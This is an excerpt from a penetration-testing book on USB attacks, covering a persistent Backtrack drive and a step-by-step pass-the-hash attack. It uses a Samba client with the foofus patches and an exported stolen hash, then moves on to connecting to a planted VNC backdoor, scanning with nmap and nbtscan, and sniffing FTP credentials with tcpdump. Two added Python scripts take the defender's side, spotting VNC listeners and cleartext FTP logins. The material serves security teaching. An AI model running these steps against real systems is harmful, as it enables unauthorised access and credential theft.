Seven Deadliest USB Attacks, part 10


DOCUMENT INFORMATION

Basic information

Format
Pages: 29
Size: 427.98 KB

Contents

Chapter 7 Social Engineering and USB

19. Type p for the second partition and press Enter.
20. Type 2 for your second partition number and press Enter.
21. When prompted, set the size of your second partition. Press Enter to accept the default value for the first cylinder.
22. Press Enter to accept the default value for the last cylinder. This will allocate the remaining space on your drive to the second partition.
23. Type t to change the partition system ID on your primary partition and press Enter.
24. Type 1 to select your first partition and press Enter.
25. Type b when prompted and press Enter. This will set your primary partition to FAT32.
26. Type t to change the partition system ID on your second partition and press Enter.
27. Type 2 to select your second partition and press Enter.
28. Type 83 when prompted and press Enter. This will set your second partition to Linux.
29. Type a to set your primary partition to active and press Enter.
30. Type 1 to select your first partition and press Enter.
31. Type w to write the partition table out to disk and exit, and then press Enter.
32. Type fdisk -l to view your partitions and press Enter.
33. Type mkfs.vfat /dev/sd*1 to format the primary partition and press Enter.
34. Type mkfs.ext3 -b 4096 -L casper-rw /dev/sd*2 to format your second partition and press Enter.

NOTE
This next series of instructions will be used to make the drive bootable.

35. Type mkdir /mnt/sd*1 and press Enter.
36. Type mount /dev/sd*1 /mnt/sd*1 and press Enter.
37. Type cd /mnt/sd*1 and press Enter.
38. Type rsync -avh /media/cdrom0/ /mnt/sd*1 and press Enter.
39. Type grub-install --no-floppy --root-directory=/mnt/sd*1 /dev/sd*1 and press Enter.

NOTE
This set of instructions will set up the persistent drive.

40. Type cd /boot/grub and press Enter.
41. Type vi menu.lst and press Enter.
42. Change the default 0 line to default 4. Using the down arrow key, navigate to the 0.
43. Once the cursor is under the 0, type x to delete the character.
44. Type a and enter 4. The line should look like the following code snippet when you are finished editing the line.

# By default, boot the first entry.
default 4

45. Set the resolution to 1024 × 768 (or a relevant size to suit your configuration) by appending vga=0x317 to the kernel line. The next steps will walk you through this.
46. Using the down arrow key, navigate to the following line and place your cursor a space after the word quiet.
47. Type a and add vga=0x317.
48. The line should look like the code snippet below when you are done.

title Start Persistent Live CD
kernel /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0x317

49. Type :wq! and press Enter to save your changes and exit vi.
50. Type reboot. Press Enter when prompted and remove the 2 GB drive.
51. Select Start Persistent Live CD. Alternatively, you can just wait 30 seconds, since we set it to autoboot into persistent mode.
52. The system will boot to a command prompt by default. Type startx to initialize the graphical user interface (GUI).

To test persistence, all you need to do is create and save a file, then reboot again. If your file is still there, you are good to go. If you will be using this build for penetrating a production environment, it is a good idea to consider encrypting your drive. Instructions for this are contained on the Backtrack site to aid in establishing an encrypted platform.H You will need to update the Backtrack build in order to accomplish this, so if you are using a 4 GB flash drive, you will be left with minimal space (approximately 350 MB). Once again, consider using a drive larger than 4 GB.

Pass the Hash, Dude

There are many ways to obtain the hash from a system, and two of the attacks in this book will have this information available. The Switchblade approach pulls these when deployed with administrator privileges, and a RAM dump will also contain this information on any system that is running with an authenticated account.
The attacks outlined in Chapter 3, "USB-Based Virus/Malicious Code Launch," Chapter 4, "USB Device Overflow," and Chapter 6, "Pod Slurping" can be crafted in a manner that will extract this information. For this attack, we will be using the hash extracted in Chapter 2, "USB Switchblade."

The following downloads will be required to complete the instructions in this section. We will use the persistent version of Backtrack 4 built in the previous section.

• Samba 3.0.22 – This tool can be downloaded from http://us3.samba.org/samba/ftp/old-versions/samba-3.0.22.tar.gz
• Add user patch from foofus – This tool can be downloaded from www.foofus.net/jmk/tools/samba-3.0.22-add-user.patch
• Pass hash patch from foofus – This tool can be downloaded from www.foofus.net/jmk/tools/samba-3.0.22-passhash.patch

In this section, we will be installing the above tools to simplify a pass-the-hash attack. All of Microsoft's authentication protocols – LAN Manager (LM), NT LAN Manager (NTLM), NTLM2, and even Kerberos 5 – are vulnerable to this attack. The Samba client approach can be performed on all with the exception of Kerberos.I The instructions included below will walk you through the installation of this tool on Backtrack 4 and illustrate a simple exploitation using a hash previously acquired.

1. Boot into Backtrack 4.
2. Type startx to launch the Backtrack 4 GUI. Figure 7.2 shows Backtrack initialized with the K menu activated.
3. If your network interface card is supported and you are on a Dynamic Host Configuration Protocol–enabled network, you should have Internet access. If you would like to connect to a wireless network, please follow steps 4 to 7.
4. Open a terminal window, type sudo start-network, and press Enter.
5. Type cd /etc/init.d and then press Enter. Type wicd and press Enter again.
6. Click the K menu in the bottom left-hand corner of the Backtrack 4 GUI, navigate to the Internet menu, and launch WICD Network Manager.

FIGURE 7.2 Backtrack OS Showing K Menu

7. Find the access point to which you want to connect and click the small arrow to expand the selection information, as shown in Figure 7.3. The wireless local area network (WLAN) service set identifier (SSID) was removed to protect our privacy.
8. Click Advanced Settings, enter key information (change the authentication type if necessary) if relevant, and click OK.
9. Select Connect, and it should establish the connection.
10. Download the samba-3.0.22 client tarball and both foofus patches into /opt using Firefox. This icon is located on the bottom toolbar. To download the patch files from Firefox in Backtrack 4, right-click the link and select Save link as.
11. Go back to the terminal window, type cd /opt, and press Enter.
12. Type tar xvfz samba-3.0.22.tar.gz and press Enter.
13. Type patch -p0 < samba-3.0.22-add-user.patch and press Enter.
14. Type patch -p0 < samba-3.0.22-passhash.patch and press Enter.
15. Type cd /opt/samba-3.0.22/source and press Enter.
16. Type ./configure --with-smbmount and press Enter.
17. Type make and press Enter.
18. Type make install and press Enter.
19. Type mkdir /mnt/msshare and press Enter. You can call this share anything, but the mount point will be referenced as /mnt/msshare in these instructions.
20. From the K menu in the bottom-left-hand corner of the Backtrack 4 GUI, navigate to the Utilities menu and open the Kate text editor.

FIGURE 7.3 WICD Network Manager Connection Options

21. Select New Session when prompted.
22. Select Open from the file menu.
23. Navigate to /etc and open fstab.
24. Add the following text to the bottom of this file.

none /mnt/msshare tmpfs defaults 0 0

25. From the file menu, select Save and then close the file.
26. In the terminal window, type cd /etc/samba and press Enter.
27. Type cp smb.conf /usr/local/samba/lib/smb.conf and press Enter.
28. Type mount /mnt/msshare and press Enter.
29. Next, add your "acquired" hash (from the USB Switchblade or other acquisition method) to the SMBHASH environment variable and enclose it in quotes. Below is an example of the export used in this testing. Type this command in the terminal exactly as shown.

export SMBHASH="B5D61D16F77BD531BA4F48580E45DD17:4BD9DF48AFEE6A47AB04E374B488EF0A"

30. Type cd /opt/samba-3.0.22/source/bin and press Enter.
31. Type ./smbmount //x.x.x.x/sharename /mnt/msshare -o username=USER and press Enter, where x.x.x.x represents the IP address, sharename the share on the victim machine, /mnt/msshare the mount point you created earlier, and USER the username associated with the hash you will be sending.
32. When prompted for the password, type at least one character and press Enter. It does not matter what you type here because the hash you entered earlier will be used.
33. Type cd /mnt/msshare to check that you have successfully mapped the Windows share. Use the ls command to list the files contained on the share.

You have now successfully authenticated to a remote machine using the hash extracted from the target. Use the cp command while in the shared directory (for example, cp file.txt /directory) to copy files to a valid location on the Backtrack system. If you are using the administrator account or one supplied with advanced user rights, then you can attach to the administrator-level shares (for example, C$). Additionally, you can use the Konqueror GUI-based tool after authentication, which is included in the next set of instructions. If these are domain-level credentials, you can use them to enumerate or attach to relevant resources in the context of this user account if the permissions are supplied.

H www.backtrack-linux.org/tutorials/
I www.sans.org/reading_room/whitepapers/testing/why_crack_when_you_can_pass_the_hash_33219
In Chapter 2, "USB Switchblade," a silent installation of VNC was completed on the target system. Backtrack has VNC built in, and you can bring up the viewer by typing vncviewer in a command shell. The GUI will initialize with a window for the IP address. Enter the appropriate IP address and the password "yougothacked," without the quotes. Be careful when performing this on a machine someone may be using; people tend to freak out when the mouse cursor begins to have a mind of its own. Success was attained attaching to an XP system infected with the Switchblade package VNC version, although tests on a Vista machine failed. After updating the VNC client on the Vista machine, a successful connection was made to it. Consider updating VNC in the USB Switchblade package.

FIGURE 7.4 Konqueror Icon Location

If you were able to attain the password or a connection with the hash, Konqueror is a Web browser/file manager included on Backtrack that can be used to browse a remote host of choice. This is a very simple tool and works similarly to Windows Explorer. The instructions below describe how to accomplish this.

1. Open Konqueror by clicking the icon next to the K menu, as shown in Figure 7.4.
2. From the Location menu, select Open location.
3. Type \\x.x.x.x\sharename and select OK. Enter the appropriate IP address for x.x.x.x and the share name for sharename.
4. Your previous session with Samba should allow you to connect in that context. If you are making a new connection, enter the credentials when prompted.

You should now be able to browse to a location of your choice, as seen in Figure 7.5. To copy the files to the Backtrack system, simply right-click on the folder or file and select Copy. Click the Home Folder in the left pane to return to the local file system. Right-click anywhere in the right-hand pane and select Paste URL. That's all there is to it.
FIGURE 7.5 Konqueror Connection to Remote System

If you obtained domain credentials, then you may want to peek at the shares available on the network. Nbtscan is an included tool that will allow you to parse these entries on the network. The instructions below illustrate a sample command and output.

1. From the K menu, go to Backtrack, Network Mapping, Identify Live Hosts, and Nbtscan.
2. Type nbtscan -r x.x.x.x/xx -v and press Enter. x.x.x.x is the IP range and xx is the subnet (for example, 192.168.1.0/24).
3. Your output should appear similar to the following code snippet.

Doing NBT name scan for addresses from 192.168.1.0/24
192.168.1.0 Sendto failed: Permission denied

NetBIOS Name Table for Host 192.168.1.76:
Incomplete packet, 48 bytes long.
Name             Service          Type

NetBIOS Name Table for Host 192.168.1.68:
Incomplete packet, 48 bytes long.
Name             Service          Type
MARKETING        <00>             UNIQUE
MARKETING        <20>             UNIQUE
DOMAIN1          <00>             GROUP
Adapter address: 00:0e:35:af:58:e4

NetBIOS Name Table for Host 192.168.1.67:
Incomplete packet, 353 bytes long.
Name             Service          Type
STORALL          <00>             UNIQUE
STORALL          <03>             UNIQUE
STORALL          <20>             UNIQUE
STORALL          <00>             UNIQUE
STORALL          <03>             UNIQUE
STORALL          <20>             UNIQUE
__MSBROWSE__     <01>             GROUP
WORKGROUP        <1d>             UNIQUE
WORKGROUP        <1b>             UNIQUE
WORKGROUP        <1d>             UNIQUE
WORKGROUP        <1e>             GROUP
WORKGROUP        <00>             GROUP
WORKGROUP        <1e>             GROUP
WORKGROUP        <1b>             UNIQUE
Adapter address: 00:00:00:00:00:00

NetBIOS Name Table for Host 192.168.1.101:
Incomplete packet, 173 bytes long.
Name             Service          Type
SHIZSTUFF        <00>             UNIQUE
WORKGROUP        <00>             GROUP
WORKGROUP        <1e>             GROUP
SHIZSTUFF        <20>             UNIQUE
Adapter address: 00:1b:9e:2d:d6:b8

Another interesting way to pass the hash is by way of the Nmap engine, as described in a recent SANS publication.J You can also use Nmap for many things, one of which is to determine the listening ports and services on a particular target. The command example below will provide you with this listing.
In this example, a scan of a network range was done like that described in the Nbtscan section above.

nmap x.x.x.x/xx -T 4 -sV -P0 -n

Below is a small sample of the large amount of data it returned. This is a very noisy command, so do not run this on a production network unless they know what you are doing.

All 1000 scanned ports on 192.168.1.76 are closed
Interesting ports on 192.168.1.101:
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5800/tcp  open  vnc-http     TightVNC
5900/tcp  open  vnc          VNC (protocol 3.8)
8888/tcp  open  sip          Mbedthis-Appweb/2.4.0 (Status: 400 Bad Request)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port8888-TCP:V=5.00%I=7%D=1/24%Time=4B5C04E0%P=i686-pc-linux-gnu%r(GetR
SF:equest,B8,"HTTP/1\.0\x20302\x20Moved\x20Temporarily\r\nDate:\x20Sun,\x2
SF:024\x20Jan\x202010\x2014:29:08\x20GMT\r\nServer:\x20Mbedthis-Appweb/2\.
SF:4\.0\r\nContent-length:\x200\r\nConnection:\x20close\r\nLocation:\x20ht

Notice the VNC service listening; somebody must have run USB Switchblade on this system. This command returned all ports of listening services on that subnet range. Again, this is just a small sampling. Instead of enumerating services, maybe you just want to check out some traffic to see what else you can find. The command below will do a verbose dump of traffic on the network from the attached device.

J www.sans.org/reading_room/whitepapers/testing/scanning_windows_deeper_with_the_nmap_scanning_engine_33138
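Added example, not code from the book: the same scan output, read from the defender's side. An administrator sweeping a subnet for the VNC server the chapter says USB Switchblade leaves behind can parse the nmap -sV port table per host and flag any open remote-access service. The sample text is constructed to match the output above; the REMOTE_ACCESS watchlist and the function names are my own assumptions.

```python
"""Added example (not the book's code): flag remote-access listeners in
nmap -sV output, the way a defender would sweep a subnet for the VNC
server that the chapter says USB Switchblade leaves behind."""
import re

# Constructed sample, shaped like the chapter's scan output (trimmed).
SAMPLE_NMAP = """\
All 1000 scanned ports on 192.168.1.76 are closed
Interesting ports on 192.168.1.101:
Not shown: 988 closed ports
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5800/tcp  open  vnc-http    TightVNC
5900/tcp  open  vnc         VNC (protocol 3.8)
49152/tcp open  msrpc       Microsoft Windows RPC
"""

HOST_RE = re.compile(r"^Interesting ports on (\S+):")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumed watchlist: services that should not be listening on a workstation
# unless IT deliberately installed them.
REMOTE_ACCESS = {"vnc", "vnc-http", "ms-wbt-server", "telnet"}


def parse_nmap(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                      # start of a new host's port table
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            hosts[current].append(
                (int(port), proto, state, service, version.strip()))
    return hosts


def flag_remote_access(hosts, watchlist=REMOTE_ACCESS):
    """Return (host, port, service, version) for every open watchlisted service."""
    return [
        (host, port, service, version)
        for host, ports in hosts.items()
        for port, _proto, state, service, version in ports
        if state == "open" and service in watchlist
    ]


if __name__ == "__main__":
    for host, port, service, version in flag_remote_access(parse_nmap(SAMPLE_NMAP)):
        print(f"{host}:{port} {service} {version} -- unexpected remote access, investigate")
```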
In this example, the test machine was using the WLAN network interface, so we indicated wlan0. If you are using a wired interface, then eth0 will probably apply. Use the ifconfig command to determine the active interface that you are using.

tcpdump -i wlan0 -A -vv >> sniff.txt

14:16:14.579737 IP (tos 0x10, ttl 64, id 56185, offset 0, flags [DF], proto TCP (6), length 64)
    192.168.1.253.48149 > 192.168.1.67.ftp: P, cksum 0xa884 (correct), 1:13(12) ack 8 win 92 <nop,nop,timestamp 3005818 441519635>
    E @.y@.@ C 3 sE \ z.Q USER administrator
14:16:14.589275 IP (tos 0x0, ttl 64, id 32045, offset 0, flags [DF], proto TCP (6), length 52)
    192.168.1.67.ftp > 192.168.1.253.48149: ., cksum 0x3872 (correct), 8:8(0) ack 13 win 1448 <nop,nop,timestamp 441519822 3005818>
    E 4}-@.@.9 C sE ? 8r .Q z
14:16:14.589723 IP (tos 0x0, ttl 64, id 32046, offset 0, flags [DF], proto TCP (6), length 86)
    192.168.1.67.ftp > 192.168.1.253.48149: P 8:42(34) ack 13 win 1448 <nop,nop,timestamp 441519822 3005818>
    E V}.@.@.8 C sE ? & .Q z331 Please specify the passwor
14:16:14.589771 IP (tos 0x10, ttl 64, id 56186, offset 0, flags [DF], proto TCP (6), length 52)
    192.168.1.253.48149 > 192.168.1.67.ftp: ., cksum 0x3d99 (correct), 13:13(0) ack 42 win 92 <nop,nop,timestamp 3005821 441519822>
    E 4.z@.@ C ? sg \= }.Q
14:16:15.441250 arp who-has 192.168.1.64 (Broadcast) tell 192.168.1.254
    s @
14:16:16.442726 arp who-has 192.168.1.69 (Broadcast) tell 192.168.1.254
    s E
14:16:16.443028 IP (tos 0x0, ttl 64, id 57257, offset 0, flags [DF], proto UDP (17), length 71)
    192.168.1.253.37429 > vnsc-bak.sys.gtei.net.domain: [udp sum ok] 65303+ PTR? 69.1.168.192.in-addr.arpa. (43)
    E G @.@ S 5.5.3 69.1.168.192.in-addr.arpa
14:16:16.468578 IP (tos 0x0, ttl 55, id 59551, offset 0, flags [none], proto UDP (17), length 148)
    vnsc-bak.sys.gtei.net.domain > 192.168.1.253.37429: 65303 NXDomain q: PTR? 69.1.168.192.in-addr.arpa. 0/1/0 ns: 168.192.in-addr.arpa. (120)
    E 7 5.5 H 69.1.168.192.in-addr.arpa
14:16:17.164939 IP (tos 0x0, ttl 4, id 0, offset 0, flags [DF], proto UDP (17), length 353)
    192.168.1.67.33333 > 239.255.255.250.1900: UDP, length 325
    E a @ C 5.l.M.[NOTIFY * HTTP/1.1 HOST: 239.255.255.250:1900 CACHE-C
14:16:17.190319 IP (tos 0x10, ttl 64, id 56187, offset 0, [...]
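Added example, not code from the book: the capture above shows an FTP login crossing the wire in the clear (USER administrator followed by the 331 password prompt). A defender auditing their own network can run the same kind of tcpdump -A text through a small parser that reports which client authenticated to which FTP server and whether a password followed, without recording the password, so the service can be moved to an encrypted protocol. The sample dump is constructed in the shape of the chapter's output; the regex and function names are my own assumptions.

```python
"""Added example (not the book's code): audit a tcpdump -A text dump for
cleartext FTP logins and report who authenticated to which server, so the
service can be migrated to SFTP/FTPS. The password itself is never stored."""
import re

# Constructed sample in the shape of the chapter's capture. The junk after
# each flow line is what -A prints for the IP/TCP header bytes.
SAMPLE_DUMP = """\
14:16:14.579737 IP (tos 0x10, ttl 64, id 56185, offset 0, flags [DF], proto TCP (6), length 64)
    192.168.1.253.48149 > 192.168.1.67.ftp: P 1:13(12) ack 8 win 92
E..@.y@.@...USER administrator
14:16:14.589723 IP (tos 0x0, ttl 64, id 32046, offset 0, flags [DF], proto TCP (6), length 86)
    192.168.1.67.ftp > 192.168.1.253.48149: P 8:42(34) ack 13 win 1448
E.V}.@.@....331 Please specify the password.
14:16:14.700412 IP (tos 0x10, ttl 64, id 56188, offset 0, flags [DF], proto TCP (6), length 71)
    192.168.1.253.48149 > 192.168.1.67.ftp: P 13:32(19) ack 42 win 92
E..G.z@.@...PASS example-only
14:16:15.441250 arp who-has 192.168.1.64 (Broadcast) tell 192.168.1.254
"""

PACKET_RE = re.compile(r"^\d\d:\d\d:\d\d\.\d+ ")          # timestamp starts a packet
FLOW_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\.(\w+) > (\d{1,3}(?:\.\d{1,3}){3})\.(\w+):")
FTP_CMD_RE = re.compile(r"\b(USER|PASS) (\S+)")


def find_cleartext_ftp_logins(dump):
    """Return [(client, server, username, password_sent)] per client->FTP flow."""
    flow, logins = None, {}
    for line in dump.splitlines():
        if PACKET_RE.match(line):      # new packet: forget the previous flow
            flow = None
            continue
        m = FLOW_RE.search(line)
        if m:
            src, _sport, dst, dport = m.groups()
            # Only the client -> server direction carries USER/PASS commands.
            flow = (src, dst) if dport == "ftp" else None
            continue
        m = FTP_CMD_RE.search(line)
        if flow and m:
            rec = logins.setdefault(flow, {"user": None, "pass": False})
            if m.group(1) == "USER":
                rec["user"] = m.group(2)
            else:
                rec["pass"] = True     # record the fact, never the secret
    return [(c, s, r["user"], r["pass"]) for (c, s), r in logins.items()]


if __name__ == "__main__":
    for client, server, user, pw in find_cleartext_ftp_logins(SAMPLE_DUMP):
        print(f"cleartext FTP login {client} -> {server} as {user!r}, password sent: {pw}")
```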

Posted: 14/08/2014, 17:21